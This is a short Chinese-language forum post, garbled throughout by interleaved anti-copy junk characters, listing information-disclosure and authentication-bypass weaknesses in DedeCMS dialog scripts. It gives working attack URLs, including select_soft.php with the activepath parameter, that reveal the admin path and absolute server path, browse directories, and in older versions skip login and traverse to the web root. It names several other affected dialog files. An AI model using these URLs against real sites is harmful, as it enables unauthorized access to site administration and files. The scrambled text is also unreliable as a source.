1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理7 x; q3 |. [: K5 c' z
/ O" ? [8 }! o e$ @: u, i7 q
员帐号,新版本的就直接转向了后台." u9 Q% n( Z4 L6 n1 G( a
# U# g3 ]+ t; {8 K; o6 B. o/ y
2.include/dialog/config.php会爆出后台管理路径1 g6 q! C& I. |: ?5 T8 v0 T* ^
& p+ s( B, M5 z' [3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
3 O2 u2 P( F+ r% T3 q$ ^
8 C1 B3 A1 B% N$ _; c0 @& K9 Z6 P4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.- V0 n# k4 z9 }' X1 O
+ s: J) a5 I4 A" Q, a# ]* d- X, b8 b
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
1 q" P! V' i8 Y% t' R% ]# A" n* m/ ?
到根目录去.不过这些版本的访问地址有些不同.& {: ^/ y l E
地址为require/dialog/select_soft.php?activepath=/././././././././, v2 B, D5 c$ O9 `1 l
% ?0 f, o& G/ m; n
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
9 i# L L7 w f4 B存在相同问题的文件还有% Q+ M m8 k& H* H4 L2 W
include\dialog\select_images.php
, r" b! u) W2 O1 I- V Dinclude\dialog\select_media.php8 p# J2 n' p2 i, Y( `- t2 o
include\dialog\select_templets.php" j# h% T# Y6 R; o* o- k b
|